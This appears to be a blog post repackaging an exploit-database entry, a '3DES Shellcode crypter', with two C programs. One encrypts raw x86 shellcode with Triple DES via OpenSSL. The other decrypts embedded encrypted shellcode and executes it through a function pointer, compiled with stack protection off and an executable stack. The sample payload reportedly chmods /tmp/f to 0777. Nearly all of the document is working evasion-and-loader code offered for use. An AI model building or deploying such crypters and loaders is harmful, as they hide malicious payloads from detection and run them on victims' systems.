# Exploit Title: 3DES Shellcode crypter
\n# Date: 08\/07\/2022
\n# Exploit Author: d7x
\n# Tested on: Ubuntu x86 \/ Ubuntu x86_64 \/ Debian 11 “bullseye”<\/p>\n
cat > 3des_crypter.c << EOF
\n\/* ***
\n*
\n* 3DES Shellcode crypter by d7x
\n*
\n* d7x.promiselabs.net
\n*
\n* Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_crypter 3des_crypter.c -lssl -lcrypto
\n*
\n* ***\/<\/p>\n
#include <stdio.h>
\n#include <stdlib.h>
\n#include <string.h>
\n#include <openssl\/des.h><\/p>\n
\/* Triple DES key for Encryption and Decryption *\/
\nDES_cblock Key1 = “3DES”;
\nDES_cblock Key2 = “Crypter”;
\nDES_cblock Key3 = “by d7x”;
\nDES_key_schedule SchKey1,SchKey2,SchKey3;<\/p>\n
\/* Print Encrypted and Decrypted bytes *\/
\nvoid print_data(const char *tittle, const void* data, int len);<\/p>\n
int main()
\n{<\/p>\n
\/* Apply 3DES keys *\/
\nDES_set_key((DES_cblock *)Key1, &SchKey1);
\nDES_set_key((DES_cblock *)Key2, &SchKey2);
\nDES_set_key((DES_cblock *)Key3, &SchKey3);<\/p>\n
\/* Place shellcode here *\/
\nunsigned char input_data[] = “\\xbb\\xcc\\xfe\\x70\\x5c\\xdb\\xd8\\xd9\\x74\\x24\\xf4\\x5d\\x29\\xc9\\xb1\\x08\\x83\\xc5\\x04\\x31\\x5d\\x11\\x03\\x5d\\x11\\xe2\\x39\\x67\\x1a\\x53\\x99\\xca\\x33\\x6c\\x19\\xeb\\xc3\\x5c\\x6d\\x86\\xb3\\x8d\\xeb\\x58\\x6f\\xba\\x0c\\x59\\x8f\\x3a\\xab\\x97\\x0f\\x50\\x4a\\x70\\xdd\\x25”;
\n\/* => chmods \/tmp\/f to 0777 *\/<\/p>\n
\/* Init vector *\/
\nDES_cblock iv = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };<\/p>\n
\/\/ DES_cblock iv = { 0xe1, 0xe2, 0xe3, 0xd4, 0xd5, 0xc6, 0xc7, 0xa8 };
\nDES_set_odd_parity(&iv);<\/p>\n
\/* Check for Weak key generation: https:\/\/www.openssl.org\/docs\/manmaster\/man3\/DES_set_key_checked.html,
\n* If the key is a weak key, then -2 is returned *\/
\nif ( -2 == (DES_set_key_checked(&Key1, &SchKey1) || DES_set_key_checked(&Key2, &SchKey2) || DES_set_key_checked(&Key3, &SchKey3)))
\n{
\nprintf(” Weak key ….\\n”);
\nreturn 1;
\n}<\/p>\n
\/* Buffers for Encryption and Decryption *\/
\nunsigned char* cipher[sizeof(input_data)];
\nunsigned char* text[sizeof(input_data)];<\/p>\n
\/* Triple-DES CBC Encryption *\/
\nDES_ede3_cbc_encrypt( (unsigned char*)input_data, (unsigned char*)cipher, sizeof(input_data), &SchKey1, &SchKey2, &SchKey3,&iv, DES_ENCRYPT);<\/p>\n
\/* Triple-DES CBC Decryption *\/
\nmemset(iv,0,sizeof(DES_cblock)); \/\/ You need to start with the same iv value
\nDES_set_odd_parity(&iv);
\nDES_ede3_cbc_encrypt( (unsigned char*)cipher, (unsigned char*)text, sizeof(input_data), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);<\/p>\n
\/* Place the encrypted output here to verify the integrity *\/
\nunsigned char c[] = \\
\n“\\xd5\\x0c\\x1e\\xee\\xfd\\x1f\\xb4\\x50\\xac\\xde\\x1a\\x59\\x4c\\x10\\xe9\\x7a\\x2c\\xb0\\x09\\x79\\x2c\\xe0\\x28\\x17\\xf4\\x60\\xc9\\x0a\\x33\\x27\\x48\\x03\\xc4\\x8d\\x4d\\x26\\x0b\\x7c\\xdd\\xa9\\xcf\\x65\\x0f\\xac\\xd3\\xc2\\xa8\\x67\\xde\\xf6\\x83\\x02\\x8a\\x01\\xa8\\x1f\\x95\\x23\\x94\\x25\\xdf\\xce\\xa3\\x79\\x0c\\xdc\\x81\\xf7”;
\nunsigned char decrypted[sizeof(c)];<\/p>\n
\/\/ DES_set_odd_parity(&iv);
\nmemset(iv,0,sizeof(DES_cblock)); \/\/ You need to start with the same iv value
\nDES_set_odd_parity(&iv);
\nDES_ede3_cbc_encrypt( (unsigned char*)c, (unsigned char*)decrypted, sizeof(c), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);<\/p>\n
\/* Printing and Verifying *\/
\nprint_data(“\\n Original “,input_data,strlen(input_data));
\nprint_data(“\\n Encrypted”,cipher,strlen(cipher));
\nprint_data(“\\n Decrypted”,text,strlen(input_data));
\nprint_data(“\\n Decrypted (manual) “,decrypted,strlen(decrypted));<\/p>\n
\/* Run shellcode *\/
\n\/* int (*ret)() = (int(*)())decrypted;
\nret(); *\/<\/p>\n
return 0;
\n}<\/p>\n
void print_data(const char *tittle, const void* data, int len)
\n{
\nprintf(“%s : “,tittle);
\nconst unsigned char * p = (const unsigned char*)data;
\nint i = 0;<\/p>\n
\/* len-1 to omit the \\x00 null terminator at the end *\/
\nfor (; i<len;++i)
\nprintf(“\\\\x%02x”, *p++);
\nprintf(” Size: %d”, len);<\/p>\n
printf(“\\n”);
\n}
\nEOF<\/p>\n
cat > 3des_decrypt.c << EOF
\n\/* ***
\n*
\n* 3DES Shellcode crypter by d7x
\n*
\n* d7x.promiselabs.net
\n*
\n* Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_decrypt 3des_decrypt.c -lssl -lcrypto
\n*
\n* ***\/<\/p>\n
#include <stdio.h>
\n#include <stdlib.h>
\n#include <string.h>
\n#include <openssl\/des.h><\/p>\n
\/* Triple DES key for Encryption and Decryption *\/
\nDES_cblock Key1 = “3DES”;
\nDES_cblock Key2 = “Crypter”;
\nDES_cblock Key3 = “by d7x”;
\nDES_key_schedule SchKey1,SchKey2,SchKey3;<\/p>\n
\/* Print Encrypted and Decrypted data packets *\/
\nvoid print_data(const char *tittle, const void* data, int len);<\/p>\n
main()
\n{<\/p>\n
\/* Apply 3DES keys *\/<\/p>\n
DES_set_key((DES_cblock *)Key1, &SchKey1);
\nDES_set_key((DES_cblock *)Key2, &SchKey2);
\nDES_set_key((DES_cblock *)Key3, &SchKey3);<\/p>\n
\/* Encrypted shellcode generated by 3des_crypter *\/
\nunsigned char shellcode_3des[] = \\
\n“\\xd5\\x0c\\x1e\\xee\\xfd\\x1f\\xb4\\x50\\xac\\xde\\x1a\\x59\\x4c\\x10\\xe9\\x7a\\x2c\\xb0\\x09\\x79\\x2c\\xe0\\x28\\x17\\xf4\\x60\\xc9\\x0a\\x33\\x27\\x48\\x03\\xc4\\x8d\\x4d\\x26\\x0b\\x7c\\xdd\\xa9\\xcf\\x65\\x0f\\xac\\xd3\\xc2\\xa8\\x67\\xde\\xf6\\x83\\x02\\x8a\\x01\\xa8\\x1f\\x95\\x23\\x94\\x25\\xdf\\xce\\xa3\\x79\\x44\\x5d\\x82\\xff\\x40\\x5d\\x82\\xff\\x06”;<\/p>\n
\/* Init vector *\/<\/p>\n
DES_cblock iv = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
\nDES_set_odd_parity(&iv);<\/p>\n
\/* buffer for the decrypted string *\/
\nunsigned char* decrypted[sizeof(shellcode_3des)];<\/p>\n
\/* Triple-DES CBC Decryption *\/<\/p>\n
memset(iv,0,sizeof(DES_cblock)); \/\/ You need to start with the same iv value
\nDES_set_odd_parity(&iv);
\nDES_ede3_cbc_encrypt( (unsigned char*)shellcode_3des, (unsigned char*)decrypted, sizeof(shellcode_3des), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);<\/p>\n
memcpy(shellcode_3des, decrypted, strlen(decrypted) );
\n\/\/ strcpy(shellcode_3des, decrypted);<\/p>\n
\/* Printing and executing *\/<\/p>\n
print_data(“\\n Encrypted”,shellcode_3des,sizeof(shellcode_3des));
\nprint_data(“\\n Decrypted”,decrypted,strlen(decrypted));<\/p>\n
\/* Run shellcode *\/<\/p>\n
int (*ret)() = (int(*)())shellcode_3des;
\nret();<\/p>\n
return 0;
\n}<\/p>\n
void print_data(const char *tittle, const void* data, int len)
\n{
\nprintf(“%s : “,tittle);
\nconst unsigned char * p = (const unsigned char*)data;
\nint i = 0;<\/p>\n
\/* len-1 to omit the \\x00 null terminator at the end *\/
\nfor (; i<len;++i)
\nprintf(“\\\\x%02x”, *p++);
\nprintf(” Size: %d”, len);<\/p>\n
printf(“\\n”);
\n}
\nEOF<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: 3DES Shellcode crypter # Date: 08\/07\/2022 # Exploit Author: d7x # Tested on: Ubuntu x86 \/ Ubuntu x86_64 \/ Debian 11 “bullseye” cat > 3des_crypter.c << EOF \/* *** * * 3DES Shellcode crypter by d7x * * d7x.promiselabs.net * * Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_crypter 3des_crypter.c -lssl -lcrypto * …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-27071","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27071","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=27071"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27071\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=27071"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=27071"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=27071"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}